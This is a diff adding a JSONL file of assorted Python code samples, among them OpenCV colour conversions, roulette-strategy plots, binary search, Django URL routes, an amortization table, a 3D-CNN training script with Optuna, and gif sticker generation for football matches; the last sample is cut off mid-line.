diff --git "a/5753.jsonl" "b/5753.jsonl"
new file mode 100644
--- /dev/null
+++ "b/5753.jsonl"
@@ -0,0 +1,757 @@
+{"seq_id":"216810488","text":"'''\nColor Spaces\nBGR\nHSV\nLAB\nRGB\n'''\nimport os\nimport cv2 as cv\nimport numpy as np \nimport matplotlib.pyplot as plt\n\n\ndir_path = os.getcwd()+'/data/images/'\nimg=cv.imread(dir_path+'flower.jpeg')\ncv.imshow('Flower',img)\n\n# 1 BGR to GRAY\ngray=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\ncv.imshow('Gray',gray)\n\n# 2 BGR to HSV\nhsv=cv.cvtColor(img,cv.COLOR_BGR2HSV)\ncv.imshow('HSV',hsv)\n\n# 3 BGR to L*A*B\nlab=cv.cvtColor(img,cv.COLOR_BGR2LAB)\ncv.imshow('LAB',lab)\n\n# 4 MATPLOTLIB IS RGB method\nplt.imshow(img)\nplt.show()\n\n# 5 BGR to RGB\nrgb=cv.cvtColor(img,cv.COLOR_BGR2RGB)\ncv.imshow('RGB',rgb)\n\n# plt.imshow(rgb)\n# plt.show()\n\n# 6 HSV to BGR\nhsv_bgr=cv.cvtColor(hsv,cv.COLOR_HSV2BGR)\ncv.imshow('HSV to BGR',hsv_bgr)\n\n# 7 LAB to BGR\nlab_bgr = cv.cvtColor(lab,cv.COLOR_LAB2BGR)\ncv.imshow('LAB to BGR',lab_bgr)\n\ncv.waitKey(0)\n","sub_path":"7 Color Spaces.py","file_name":"7 Color Spaces.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"47279891","text":"import random\r\nimport numpy as np \r\nimport math\r\nfrom matplotlib import pyplot as p\r\nimport scipy.stats as ss\r\nfrom ejecucion_estrategys import *\r\n\r\n#def save(nombre):\r\n    #p.savefig(f\"{nombre}.jpg\", bbox_inches='tight')\r\n\r\ndef graph_rondas(cant_jugadores, cant_jugadas, flujo_caja_total, capital0, capital_finito):\r\n    # Run several rounds, each with several plays\r\n    p.title(f'Flujo de caja en {cant_jugadores} rondas de {cant_jugadas} tiradas.')\r\n    for i in range(cant_jugadores):\r\n        X = np.arange(0, len(flujo_caja_total[i]))\r\n        p.plot(X, flujo_caja_total[i])\r\n    p.xlabel('Numero de tirada (n)')\r\n    p.ylabel('Flujo de caja')\r\n\r\n    if capital_finito:\r\n        p.axhline(y = capital0, color = 'b', label = \"Flujo de caja inicial\")\r\n        p.legend(loc = 'best')\r\n    \r\n    p.show()\r\ndef graph_diagrama_barras(cant_jugadores, frelativa_fav, cant_jugadas, frelativa_nofav):\r\n    fig1 = p.figure(\"Diagramas de barra\")\r\n    fig1.subplots_adjust(hspace=0.46, wspace=0.29, left=0.09, right=0.95)\r\n\r\n    #=========================== Bar chart of successes\r\n    fig1.add_subplot(2,1,1)\r\n    p.bar(range(cant_jugadores),frelativa_fav, color = \"g\")\r\n    p.xticks(range(cant_jugadores),range(cant_jugadas))\r\n    p.title(\"Frecuencia relativa de exitos por ronda\")\r\n    p.xlabel('Numero de ronda (N)')\r\n    p.ylabel('Frec relativa de exitos')\r\n\r\n    #=========================== Bar chart of failures\r\n    fig1.add_subplot(2,1,2)\r\n    p.bar(range(cant_jugadores),frelativa_nofav,color = \"r\")\r\n    p.xticks(range(cant_jugadores),range(cant_jugadas))\r\n    p.title(\"Frecuencia relativa de fracasos por ronda\")\r\n    p.xlabel('Numero de ronda (N)')\r\n    p.ylabel('Frec relativa de fracasos')\r\n    p.show()\r\n\r\ndef graph_exitos_vs_fracasos(cant_jugadas,cant_jugadores,frelativa_fav,frelativa_nofav):\r\n    #=========================== Successes vs. failures curves\r\n    p.figure(figsize=(10, 10))\r\n    p.title(f'Frecuencia relativa de éxitos y fracasos por ronda: {cant_jugadas} corridas')\r\n    p.plot(np.arange(0,cant_jugadores),frelativa_nofav, color = 'r', label='Cantidad de fracasos')\r\n    p.plot(np.arange(0,cant_jugadores),frelativa_fav, color = 'g', label='Cantidad de exitos')\r\n    p.xlabel('Numero de ronda (N)')\r\n    p.ylabel('Frec relativa de exitos(v) - fracasos(r)')\r\n    p.axhline(y = 0.5, color = 'b')\r\n    
p.legend(loc = 'best')\r\n    p.show()\r\n    \r\ndef graph_estrategias_casos_extremos(estrategia):\r\n    #=========================== Strategy behaviour in extreme cases.\r\n    rango = 6\r\n    bet0 = 100\r\n    loss = []\r\n    win = []\r\n\r\n    X_rondas = np.arange(1, rango + 1)\r\n    if estrategia == 'Estrategia Martingala':\r\n        for i in range(1, rango + 1):\r\n            loss.append(bet0 * ((2 ** i) - 1))\r\n            win.append(bet0 * i)\r\n\r\n    elif estrategia == 'Estrategia Fibonacci':\r\n        sec_fibo = 11 \r\n        loss_total = 0\r\n        cont_win = 0\r\n        for i in range(sec_fibo,rango + sec_fibo):\r\n            loss_total = loss_total + secuencia_fibonacci(i)\r\n            cont_win += 1\r\n\r\n        win.append( secuencia_fibonacci(sec_fibo) * cont_win) \r\n        loss.append( loss_total)\r\n    else:\r\n        for i in range(1, rango + 1):\r\n            win.append(bet0 * i)\r\n            loss.append(bet0 * i)\r\n\r\n    #=========================== Plots\r\n    p.figure(estrategia)#, figsize=(8, 8)) \r\n    p.title('Casos extremos en n tiradas')\r\n    p.plot(X_rondas, loss, color = 'r', label='Racha mala')\r\n    p.plot(X_rondas, win, color = 'g', label='Racha buena')\r\n    p.xlabel('Numero de tiradas (n)')\r\n    p.ylabel('Cantidad apostada acumulada en $')\r\n    p.legend(loc='best')\r\n    p.show()\r\n\r\ndef graph_martingala_dist_normal(estrategia):\r\n    if estrategia == 'Estrategia Martingala':\r\n        p.figure(figsize=(8, 8))\r\n        n = 10\r\n        p1 = 19/37\r\n        for cant_jugadores in range(10,100,10):\r\n            esperanza = round(1 - (p1*2)**n,2)\r\n            sigma = round(np.sqrt((4 * p1)**n - (2 * p1)**(2*n)),2)\r\n\r\n            esperanza = cant_jugadores * esperanza\r\n            sigma = cant_jugadores * sigma\r\n\r\n            X_normal = ss.norm(esperanza, sigma) #-30.56,365.41)\r\n            x_normal = np.arange(X_normal.ppf(0.001),X_normal.ppf(0.999))\r\n            p.title('Distribucion de ganancias Martingala')\r\n            p.plot(x_normal,X_normal.pdf(x_normal))#, label = f'NT = {cant_jugadores}')\r\n        \r\n        p.axvline(esperanza, color = 'y', label='Media')\r\n        p.xlabel('Ganancia')\r\n        p.show() \r\n\r\ndef graph_pie(total_favs, total_no_favs):\r\n    veces_ganadas_perdidas = [total_favs, total_no_favs]\r\n    nombres = [\"cant. veces con ganancia\",\"cant. veces con perdida\"]\r\n    p.pie(veces_ganadas_perdidas, labels=nombres, autopct=\"%0.1f %%\")\r\n    p.title(\"Porcentaje cant. 
veces con ganancia VS perdida\")\r\n    p.show()\r\n    \r\ndef graph_flujo_recuperar_apuesta(cant_jugadas, pleno = 0):\r\n    favs = 0\r\n    nofavs = 0\r\n    recuperando_apuesta = []\r\n    for i in range(1, cant_jugadas + 1): \r\n        if(tirar_ruleta(pleno)):\r\n            favs += 1 \r\n        else:\r\n            nofavs += 1 \r\n        #=========================== Track how the cash flow evolves while recovering the stake\r\n        recuperando_apuesta.append(favs - nofavs)\r\n    \r\n    p.title('Recuperando la apuesta inicial')\r\n    p.axhline(y = 0, color = 'b', label = 'Capital inicial')\r\n    p.plot(np.arange(0,cant_jugadas), recuperando_apuesta, color = 'm', lw = '2')\r\n    p.xlabel('Numero de tiradas (n)')\r\n    p.ylabel('Variaciones en el flujo de caja')\r\n    p.show()","sub_path":"TP 1.2 - Estudio economico ruleta/Codigo/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"421111369","text":"#!/usr/bin/env python3\n\"\"\"Code to plot the TGDL solutions.\"\"\"\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\n# Path to the location you want to make a movie of\nload_path = '/home/james/Ising_Model_Codes/TGDL_Solutions/'\nfile_names = [\"ground_1.npy\", \"stripe_1.npy\", \"diagonal_1.npy\"]\n\nthe_times = [1.5, 2.5, 20, 300]\n\nwidth = 3.375\nheight = 3 * width / (len(the_times)) + 0.125\n\nfig, ax = plt.subplots(3, len(the_times), figsize=(width, height))\nfig.subplots_adjust(left=0.01, right=0.99, bottom=0.06, top=0.99,\n                    wspace=0.05, hspace=0.05)\n\nfor file_name in enumerate(file_names):\n\n    snapshots = np.load(load_path + file_name[1])\n    sample_times = np.load(load_path + 'measured_times.npy')\n\n    for i in range(len(the_times)):\n\n        index = np.argmin(np.abs(sample_times - the_times[i]))\n\n        frame_num = index\n        ax[file_name[0], i].imshow(snapshots[:, :, frame_num],\n                                   vmin=-1, vmax=1, cmap=\"RdGy\")\n\n        ax[file_name[0], i].set_xticks([])\n        ax[file_name[0], i].set_yticks([])\n\n        ax[-1, i].set_xlabel(r\"$t = %.2f$\" %\n                             np.round(sample_times[frame_num], 2),\n                             fontsize=10, labelpad=2)\n\nx_pos, y_pos = 0.7, 0.86\nax[0, -1].text(x_pos, y_pos, r\"(a)\", color=\"white\", fontsize=10,\n               transform=ax[0, -1].transAxes)\nax[1, -1].text(x_pos, y_pos, r\"(b)\", color=\"white\", fontsize=10,\n               transform=ax[1, -1].transAxes)\nax[2, -1].text(x_pos, y_pos, r\"(c)\", color=\"white\", fontsize=10,\n               transform=ax[2, -1].transAxes)\n\n\nif not os.path.exists(\"images/\"):\n    os.makedirs(\"images/\")\n\nfig.savefig(\"images/tgdl_evo.pdf\", format=\"pdf\", dpi=1000)\n","sub_path":"plot_evolution.py","file_name":"plot_evolution.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"169686212","text":"def binary_search_recursive(alist, item):\n    if len(alist) == 0:\n        return False\n\n    mid_idx = len(alist) // 2\n\n    if alist[mid_idx] == item:\n        return True\n    elif alist[mid_idx] < item:\n        return binary_search_recursive(alist[mid_idx + 1:], item)\n    else:\n        return binary_search_recursive(alist[:mid_idx], item)\n\n\ndef binary_search(alist, item):\n    low, high = 0, len(alist) - 1\n\n    # use <= so a single remaining element is still checked\n    while low <= high:\n        mid_idx = (low + high) // 2\n        if alist[mid_idx] == item:\n            return True\n        elif alist[mid_idx] < item:\n            low = mid_idx + 1\n        else:\n            high = mid_idx - 1\n\n    return False\n\n\ntestlist = [0, 1, 2, 8, 13, 17, 19, 32, 42, ]\nprint(binary_search_recursive(testlist, 
3))\nprint(binary_search_recursive(testlist, 13))\n\nprint(binary_search(testlist, 3))\nprint(binary_search(testlist, 13))\n","sub_path":"codes/13_binary_search.py","file_name":"13_binary_search.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"313881432","text":"from django.conf.urls import url\n\nfrom . import views\n\n\nuuid_regex = '([a-zA-Z]|[0-9]){8}\\-([a-zA-Z]|[0-9]){4}\\-([a-zA-Z]|[0-9]){4}\\-([a-zA-Z]|[0-9]){4}\\-([a-zA-Z]|[0-9]){12}'\n\n\nurlpatterns = [\n    url(r'^create-user/$', views.create_user_view, name='create_user'),\n    url(r'(?P<user_id>{})/$'.format(uuid_regex), views.write_key_view,\n        name='write_key'),\n    url(r'^(?P<user_id>{})/(?P<key>[A-Za-z0-9]+)/$'.format(uuid_regex),\n        views.get_or_delete_view, name='get_key'),\n]\n","sub_path":"week2/FirstDay/keyvaluestore2/store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"523299187","text":"from pylab import *\nfrom EL63 import EL63\n\ndef obs_prop(obs,truth,h=0.01,a=10.0,b=8.0/3.0,r=28.0,tfin=2000,tanl=20):\n    #loop over number of analyses\n    Nanl = int(tfin/tanl)\n    out_traj = zeros([3,tfin+1])\n    for j in range(Nanl-1):\n        #propagate each particle to next analysis step\n        out_traj[:,(j+1)*tanl:(j+2)*tanl+1] = EL63(tanl,h,obs[:,j],a,r,b)\n    \n    error = abs(out_traj - truth)\n    error_dist = zeros(tfin+1) \n    avg_error = zeros(tfin+1)\n    for i in range(tfin+1):\n        error_dist[i] = sqrt(error[:,i].dot(error[:,i]))\n        avg_error[i] = mean(error_dist[0:i+1])\n    return(out_traj,error, avg_error)","sub_path":"obs_prop.py","file_name":"obs_prop.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"297218907","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\n\nim_path = '../input/ships_train2018'\ncsv_train = '../input/train_ship_segmentations_v2.csv'\n\nif __name__ == '__main__':\n    # Read the original annotation file\n    df = pd.read_csv(csv_train)\n    print(\"所有标注数: \",df.shape[0])\n\n    # Drop empty annotations\n    df = df.dropna(axis=0)\n    num_of_ships = df.shape[0]\n    print(\"实例标注数: \",num_of_ships)\n\n    # Create an empty set to hold the image file names\n    images = set()\n    for line in range(num_of_ships):\n        if df.iloc[line,0] not in images:\n            images.add(df.iloc[line,0])\n    print(\"含船图片数: \",len(images))\n\n    # Delete images that contain no ships\n    count = 0\n    ims = os.listdir(im_path)\n    for im in ims:\n        if im not in images:\n            os.remove(os.path.join(im_path, im))\n            count += 1\n    print('%d images were deleted.'%(count))","sub_path":"0_airbus_delete_empty_im.py","file_name":"0_airbus_delete_empty_im.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"596031976","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n\nclass Amortization(object):\n\n    def __init__(self, amount, interest, n):\n        self.amount = amount\n        self.interest = interest\n        self.n = n\n\n    @property\n    def annuity(self):\n        # standard annuity payment: i * A / (1 - (1 + i) ** -n)\n        return self.interest * self.amount / (1 - (1 + self.interest) ** -self.n)\n\n    def get_table(self):\n        \"\"\"Create a pandas dataframe representing the amortization table.\"\"\"\n        rows = []\n        loan_value = self.amount\n        payment = self.annuity\n        for i in range(self.n):\n            interest_value = loan_value * self.interest\n            principal = payment - interest_value\n            loan_value = loan_value - principal\n            rows.append({\n                \"interest\": interest_value,\n                \"payment\": 
payment,\n                \"principal\": principal,\n                \"loan_value\": loan_value\n            })\n        return pd.DataFrame(rows).rename_axis(\"period\").reset_index()\n\n    def get_plot(self):\n        \"\"\"Create a plot (fig) to visualize at least two variables from the amortization table.\"\"\"\n        df = self.get_table()\n        plot = df.plot.bar(x=\"period\", y=[\"principal\",\"interest\"], stacked=True)\n        fig = plot.get_figure()\n        plt.show()\n        return fig\n\n","sub_path":"activities/classwork/amortization/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"415883510","text":"import os\nimport sys\nimport json\nimport math\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom torch.optim import lr_scheduler\n\nfrom opts import parse_opts\nfrom model import generate_model\nfrom mean import get_mean, get_std\nfrom spatial_transforms import (\n    Compose, Normalize, Scale, CenterCrop, CornerCrop, MultiScaleCornerCrop,\n    MultiScaleRandomCrop, RandomHorizontalFlip, ToTensor)\nfrom temporal_transforms import LoopPadding, TemporalRandomCrop\nfrom target_transforms import ClassLabel, VideoID\nfrom target_transforms import Compose as TargetCompose\nfrom dataset import get_training_set, get_validation_set, get_test_set\nfrom utils import Logger, ImbalancedDatasetSampler\nfrom train import train_epoch\nfrom validation import val_epoch\nimport test\n\nfrom tensorboardX import SummaryWriter\n\nimport optuna\n\n\ndef objective(trial):\n    opt = parse_opts()\n\n    if trial:\n        opt.weight_decay = trial.suggest_uniform('weight_decay', 0.01, 0.1)\n        opt.learning_rate = trial.suggest_uniform('learning_rate', 1e-5, 1e-4)\n\n    if opt.root_path != '':\n        opt.video_path = os.path.join(opt.root_path, opt.video_path)\n        opt.annotation_path = os.path.join(opt.root_path, opt.annotation_path)\n        opt.result_path = os.path.join(opt.root_path, opt.result_path)\n        if opt.resume_path:\n            opt.resume_path = os.path.join(opt.root_path, opt.resume_path)\n        if opt.pretrain_path:\n            opt.pretrain_path = os.path.join(opt.root_path, opt.pretrain_path)\n    opt.scales = [opt.initial_scale]\n    for i in range(1, opt.n_scales):\n        opt.scales.append(opt.scales[-1] * opt.scale_step)\n    opt.arch = '{}-{}'.format(opt.model, opt.model_depth)\n    opt.mean = get_mean(opt.norm_value, dataset=opt.mean_dataset)\n    opt.std = get_std(opt.norm_value)\n    print(opt)\n    with open(os.path.join(opt.result_path, 'opts.json'), 'w') as opt_file:\n        json.dump(vars(opt), opt_file)\n\n    torch.manual_seed(opt.manual_seed)\n\n    model, parameters = generate_model(opt)\n    print(model)\n    criterion = nn.CrossEntropyLoss()\n    if not opt.no_cuda:\n        criterion = criterion.cuda()\n\n    if opt.no_mean_norm and not opt.std_norm:\n        norm_method = Normalize([0, 0, 0], [1, 1, 1])\n    elif not opt.std_norm:\n        norm_method = Normalize(opt.mean, [1, 1, 1])\n    else:\n        norm_method = Normalize(opt.mean, opt.std)\n\n    # norm_method = Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n\n    if not opt.no_train:\n        assert opt.train_crop in ['random', 'corner', 'center']\n        if opt.train_crop == 'random':\n            crop_method = MultiScaleRandomCrop(opt.scales, opt.sample_size)\n        elif opt.train_crop == 'corner':\n            crop_method = MultiScaleCornerCrop(opt.scales, opt.sample_size)\n        elif opt.train_crop == 'center':\n            crop_method = MultiScaleCornerCrop(\n                opt.scales, opt.sample_size, crop_positions=['c'])\n        spatial_transform = Compose([\n            crop_method,\n            RandomHorizontalFlip(),\n            ToTensor(opt.norm_value), norm_method\n        ])\n        
temporal_transform = TemporalRandomCrop(opt.sample_duration)\n target_transform = ClassLabel()\n training_data = get_training_set(opt, spatial_transform,\n temporal_transform, target_transform)\n train_loader = torch.utils.data.DataLoader(\n training_data,\n batch_size=opt.batch_size,\n # sampler option is mutually exclusive with shuffle\n shuffle=False,\n sampler=ImbalancedDatasetSampler(training_data),\n num_workers=opt.n_threads,\n pin_memory=True)\n train_logger = Logger(\n os.path.join(opt.result_path, 'train.log'),\n ['epoch', 'loss', 'acc', 'lr'])\n train_batch_logger = Logger(\n os.path.join(opt.result_path, 'train_batch.log'),\n ['epoch', 'batch', 'iter', 'loss', 'acc', 'lr'])\n\n optimizer = optim.Adam(\n parameters, lr=opt.learning_rate, weight_decay=opt.weight_decay)\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n optimizer, verbose=True, factor=0.1 ** 0.5)\n if not opt.no_val:\n spatial_transform = Compose([\n Scale(opt.sample_size),\n CenterCrop(opt.sample_size),\n ToTensor(opt.norm_value), norm_method\n ])\n temporal_transform = LoopPadding(opt.sample_duration)\n target_transform = ClassLabel()\n validation_data = get_validation_set(\n opt, spatial_transform, temporal_transform, target_transform)\n val_loader = torch.utils.data.DataLoader(\n validation_data,\n batch_size=opt.batch_size,\n shuffle=False,\n sampler=ImbalancedDatasetSampler(validation_data),\n num_workers=opt.n_threads,\n pin_memory=True)\n val_logger = Logger(\n os.path.join(opt.result_path, 'val.log'), ['epoch', 'loss', 'acc'])\n\n if opt.resume_path:\n print('loading checkpoint {}'.format(opt.resume_path))\n checkpoint = torch.load(opt.resume_path)\n assert opt.arch == checkpoint['arch']\n\n opt.begin_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'])\n if not opt.no_train:\n optimizer.load_state_dict(checkpoint['optimizer'])\n\n print('run')\n writer = SummaryWriter(\n comment=f\"_wd{opt.weight_decay}_lr{opt.learning_rate}_ft_begin{opt.ft_begin_index}_pretrain{not opt.pretrain_path == ''}\")\n for i in range(opt.begin_epoch, opt.n_epochs + 1):\n if not opt.no_train:\n epoch, losses_avg, accuracies_avg = train_epoch(i, train_loader, model, criterion, optimizer, opt,\n train_logger, train_batch_logger)\n writer.add_scalar('loss/train', losses_avg, epoch)\n writer.add_scalar('acc/train', accuracies_avg, epoch)\n\n if not opt.no_val:\n epoch, val_losses_avg, val_accuracies_avg = val_epoch(i, val_loader, model, criterion, opt,\n val_logger)\n writer.add_scalar('loss/val', val_losses_avg, epoch)\n writer.add_scalar('acc/val', val_accuracies_avg, epoch)\n\n if not opt.no_train and not opt.no_val:\n scheduler.step(val_losses_avg)\n print('=' * 100)\n\n if opt.test:\n spatial_transform = Compose([\n Scale(int(opt.sample_size / opt.scale_in_test)),\n CornerCrop(opt.sample_size, opt.crop_position_in_test),\n ToTensor(opt.norm_value), norm_method\n ])\n temporal_transform = LoopPadding(opt.sample_duration)\n target_transform = VideoID()\n\n test_data = get_test_set(opt, spatial_transform, temporal_transform,\n target_transform)\n test_loader = torch.utils.data.DataLoader(\n test_data,\n batch_size=opt.batch_size,\n shuffle=False,\n num_workers=opt.n_threads,\n pin_memory=True)\n test.test(test_loader, model, opt, test_data.class_names)\n\n writer.close()\n return val_losses_avg\n\n\ndef main():\n opt = parse_opts()\n print('=' * 100)\n print(f'OPTUNA_TRIALS = {opt.optuna_trials}')\n print('=' * 100)\n if opt.optuna_trials:\n study = optuna.create_study()\n 
study.optimize(objective, n_trials=opt.optuna_trials)\n        print(study.best_params)\n    else:\n        objective(None)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"511160597","text":"import os\nimport cv2\nimport pandas as pd\nimport numpy as np\nimport imageio\nfrom PIL import Image, ImageFont, ImageDraw\nfrom pygifsicle import optimize\nimport glob\nimport json\n\nMATCHES_INFO_PATH = './Data/matches_info.csv'\nmatches_info_global = pd.read_csv(\n    MATCHES_INFO_PATH\n)\n\nteams_info_file = './Data/teams_info.json'\nwith open(teams_info_file, 'r') as file:\n    teams_info_global = json.load(file)\n\n\ndef return_closest_match_info(input_dict, matches_df):\n    '''\n    input_dict = {'lon': 0, 'lat': 0, 'time': 0}\n    '''\n    lonlat = matches_df.loc[:, ['venue_lon', 'venue_lat']].values\n    user_lonlat = np.array([input_dict['lon'], input_dict['lat']])\n    dists = np.square(lonlat[:,np.newaxis]-user_lonlat).sum(axis=2)\n    closest_venue_id = matches_df.iloc[np.argmin(dists),:]['venue_id']\n    closest_matches = matches_df[matches_df['venue_id'] == closest_venue_id]\n    # use the absolute time difference so the nearest match in either direction wins\n    closest_match_id = np.argmin(np.abs(closest_matches['match_start_time'].values - input_dict['time']))\n    result = dict(closest_matches.iloc[closest_match_id, :])\n    INT_COLS = ['match_id', 'match_start_time', 'venue_capacity', 'home_score', 'away_score']\n    FLOAT_COLS = ['venue_lon', 'venue_lat']\n    for col in INT_COLS:\n        result[col] = int(result[col])\n    for col in FLOAT_COLS:\n        result[col] = float(result[col])\n    del result['Unnamed: 0']\n    return result\n\n\ndef alpha_blend(fg, bg, alpha):\n    fg = fg.astype(\"float\")\n    bg = bg.astype(\"float\")\n    alpha = alpha.astype(\"float\") / 255\n    fg = cv2.multiply(alpha, fg)\n    bg = cv2.multiply(1 - alpha, bg)\n    output = cv2.add(fg, bg)\n    return output.astype(\"uint8\")\n\n\ndef overlay_image(bg, fg, fgMask, coords):\n    (sH, sW) = fg.shape[:2]\n    (x, y) = coords\n    overlay = np.zeros(bg.shape, dtype=\"uint8\")\n    overlay[y:y + sH, x:x + sW] = fg\n    alpha = np.zeros(bg.shape[:2], dtype=\"uint8\")\n    alpha[y:y + sH, x:x + sW] = fgMask\n    alpha = np.dstack([alpha] * 3)\n    output = alpha_blend(overlay, bg, alpha)\n    return output\n\n\ndef create_sticker_with_info(match_info):\n    img = imageio.imread(\"./Data/versus_bkg.png\")\n    back_alpha = img[:, :, 3]\n    back = img[:, :, :3]\n    logo_1 = cv2.resize(\n        imageio.imread(match_info[\"home_team_logo\"]), (70, 70)\n    )\n    logo_2 = cv2.resize(\n        imageio.imread(match_info[\"away_team_logo\"]), (70, 70)\n    )\n    overlay = overlay_image(\n        back, logo_1[:, :, :3], logo_1[:, :, 3], (20, 0)\n    )\n    overlay = overlay_image(\n        overlay, logo_2[:, :, :3], logo_2[:, :, 3], (back.shape[1] - 90, 0)\n    )\n    \n    fontpath = \"./Data/Grey Sans Bold.ttf\" \n    font = ImageFont.truetype(fontpath, 24)\n    img_pil = Image.fromarray(overlay)\n    draw = ImageDraw.Draw(img_pil)\n    b,g,r,a = 0,0,0,0\n    draw.text((50, overlay.shape[0] - 35), str(match_info[\"home_score\"]), font=font, fill=(b,g,r,a))\n    draw.text((overlay.shape[1] - 65, overlay.shape[0] - 35), str(match_info[\"away_score\"]), font=font, fill=(b,g,r,a))\n    \n    overlay = np.array(img_pil)\n    png = np.dstack((overlay, back_alpha))\n    return png\n\n\ndef generate_gifs(image, match_info, choice):\n    if ((int(choice) == 1) and (match_info[\"home_score\"] > match_info[\"away_score\"])) or ((int(choice) == 2) and (match_info[\"home_score\"] <= match_info[\"away_score\"])):\n        GIF_FOLDERS = [\"win\"]\n    else:\n        
GIF_FOLDERS = [\"noooo\"]\n GIF_FOLDERS += ['goal', '1_0', 'woman_red_card']#, 'noooo', 'win' 'lost']\n SCALE_FACTORS = {'woman_red_card': (2, 2), 'goal': (1, 1), '1_0': (5, 5), \n 'noooo': (2, 2), 'win': (2, 2)}#, 'lost': (2, 2)}\n COORDS = {'woman_red_card': (0.6, 0.8), 'goal': (0, 0.3), '1_0': (0.1, 0.85), \n 'noooo': (0, 0.8), 'win': (0.1,0.75)}#, 'lost': (0,0.7)}\n NUM_FRAMES = {'woman_red_card': 45, 'goal': 24, '1_0': 10, \n 'noooo': 8, 'win': 2}#, 'lost': 2}\n DURATION = {'woman_red_card': 50, 'goal': 100, '1_0': 150, \n 'noooo': 100, 'win': 100}#, 'lost': 100}\n \n STATIC_IMAGE = cv2.resize(image, dsize=(480, 640))\n\n for i, gif_name in enumerate(GIF_FOLDERS):\n static_image = STATIC_IMAGE\n if gif_name == 'win' or gif_name == 'noooo':\n versus_sticker = create_sticker_with_info(match_info=match_info)\n versus_img = versus_sticker[:,:,:3]\n versus_img_mask = versus_sticker[:,:,3]\n static_image = overlay_image(\n bg=static_image, \n fg=versus_img, \n fgMask=versus_img_mask, \n coords=(\n static_image.shape[1]//4,\n 20\n )\n )\n gif = []\n for img_name in sorted(glob.glob(f'./Data/{gif_name}/frame_*.gif')):\n curr_frame = imageio.mimread(img_name)[0]\n gif.append(\n cv2.resize(\n curr_frame, \n dsize=(\n curr_frame.shape[1]//SCALE_FACTORS[gif_name][0], \n curr_frame.shape[0]//SCALE_FACTORS[gif_name][1])\n )\n ) \n gif_array = []\n for idx, gif_frame in enumerate(gif):\n gif_img = gif_frame[:,:,:3]\n gif_img_mask = gif_frame[:,:,3]\n overlayed_img = overlay_image(\n bg=static_image, \n fg=gif_img, \n fgMask=gif_img_mask, \n coords=(\n int(static_image.shape[1]*COORDS[gif_name][0]),\n int(static_image.shape[1]*COORDS[gif_name][1])\n )\n )\n gif_array.append(Image.fromarray(overlayed_img))\n # GIF version\n gif_array[0].save(\n f'./static/gifs/{i}.gif', \n save_all=True, \n append_images=gif_array[:NUM_FRAMES[gif_name]], \n duration=DURATION[gif_name], \n loop=0\n )\n optimize(f'./static/gifs/{i}.gif')\n # VIDEO version\n# dump_video(\n# filename=f'./static/gifs/{i}.mp4',\n# clip=gif_array\n# )\n \n return [f'95.213.37.132:5000/static/gifs/{i}.gif' for i in range(len(GIF_FOLDERS))]\n\n\ndef interpolate(f_co, t_co, interval):\n det_co =[(t - f) / interval for f , t in zip(f_co, t_co)]\n for i in range(interval):\n yield [round(f + det * i) for f, det in zip(f_co, det_co)]\n\n \ndef return_gradient(teams_info, team_name):\n ALREADY_GENERATED_GRADS = [x.split('.')[0] for x in os.listdir('./static/grads/')]\n if team_name in ALREADY_GENERATED_GRADS:\n return f'http://95.213.37.132:5000/static/grads/{team_name}.jpg'\n h1 = teams_info[team_name]['colors'][0]['first'].lstrip('#')\n h2 = teams_info[team_name]['colors'][0]['second'].lstrip('#')\n rgb1 = tuple(int(h1[i:i+2], 16) for i in (0, 2, 4))\n rgb2 = tuple(int(h2[i:i+2], 16) for i in (0, 2, 4))\n gradient = Image.new('RGBA', (720, 240), color=0)\n draw = ImageDraw.Draw(gradient)\n for i, color in enumerate(interpolate(rgb1, rgb2, 720 * 2)):\n draw.line([(i, 0), (0, i)], tuple(color), width=1)\n gradient = np.array(gradient)\n logo_img = imageio.imread(teams_info[team_name]['logo']['main'])\n scale = gradient.shape[0] / logo_img.shape[1]\n logo_img = cv2.resize(\n logo_img, dsize=(int(logo_img.shape[1]*scale), int(logo_img.shape[0]*scale))\n )\n center_x = gradient.shape[1]//2-logo_img.shape[1]//2\n if logo_img.shape[2] == 3:\n logo_alpha = np.ones((logo_img.shape[0], logo_img.shape[1], 4))*255\n logo_alpha[...,:3] = logo_img\n logo_img = logo_alpha\n grad_with_logo = overlay_image(\n bg=gradient[...,:3], fg=logo_img[...,:3], 
